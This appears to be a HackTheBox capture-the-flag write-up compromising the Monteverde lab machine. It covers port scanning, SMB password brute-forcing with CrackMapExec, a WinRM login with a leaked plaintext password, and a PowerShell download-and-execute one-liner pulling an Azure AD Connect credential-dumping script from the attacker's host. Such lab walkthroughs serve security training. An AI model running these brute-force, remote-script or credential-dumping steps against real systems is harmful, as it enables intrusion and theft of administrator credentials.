Learn how to hack a Monteverde machine on HackTheBox: port scanning, brute-forcing SMB, using the Azure Admins group to elevate privileges, and gaining admin access.
In this article, we will set the SMB password and elevate privileges to administrator level using an account that is a member of the Azure Admins group.
The lab is connected via VPN. It is recommended to avoid using your work computer or devices that store sensitive data, as you will be on a private network with other users who have cybersecurity expertise.
This machine has an IP address of 10.10.10.172, which I add to /etc/hosts.
10.10.10.172 monteverde.htb
First, a scan is performed for open ports. To save time, the initial scan is performed using masscan, as it takes longer to scan all ports with nmap.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.172 --rate=500
There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.
nmap monteverde.htb -p49778,88,593,49667,53,445,5985,49675,9389,3268,49706,389,464,49674,139,636,135,3269,49673
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A monteverde.htb -p88,593,53,445,5985,9389,3268,389,464,139,636,135,3269
First of all, we check SMB. We will do this using enum4linux. This way we will get the users, as well as their group membership.
enum4linux -a monteverde.htb
As usual, password brute-force is performed in parallel during the entry point search process. Given that the password policy requires a minimum password length of 7 characters, appropriate lists are created for selection.
Now let’s run the brute using CrackMapExec.
cme smb monteverde.htb -u ./users.txt -p ./passwords.txt
Surprisingly, this worked – the user’s credentials were found. Now the resources available to this user are checked.
cme smb monteverde.htb -u SABatchJobs -p SABatchJobs --shares
Let’s turn to the users$ resource.
smbclient -U SABatchJobs%SABatchJobs //10.10.10.172/users$
Let’s recursively look at all the files on the server.
And let’s see what’s in the file.
Now we connect to WinRM and remove the user flag.
evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
We are checking the user account information.
It consists of the Azure Admins group — this is the LPE vector. We use Azure-ADConnect to connect to the Azure database. We download the script from the local server to the remote machine and execute it.
IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.60/Azure-ADConnect.ps1') Azure-ADConnect -server 127.0.0.1 -db ADSync
We get the administrator credentials. We connect and pick up the flag.
Full access to the system is provided.
By going through a Monteverde machine on HackTheBox, it was demonstrated how practical cybersecurity skills help to find vulnerabilities and gain control over the system. Step by step, port scanning, password selection, access rights analysis and elevation of privileges to the administrator level were performed.
This process emphasizes the importance of knowledge in working with network protocols, account vulnerabilities and the specifics of integration with Azure. For cybersecurity professionals, this is not only a training in technical skills, but also an important lesson in the value of protecting their systems from such attacks.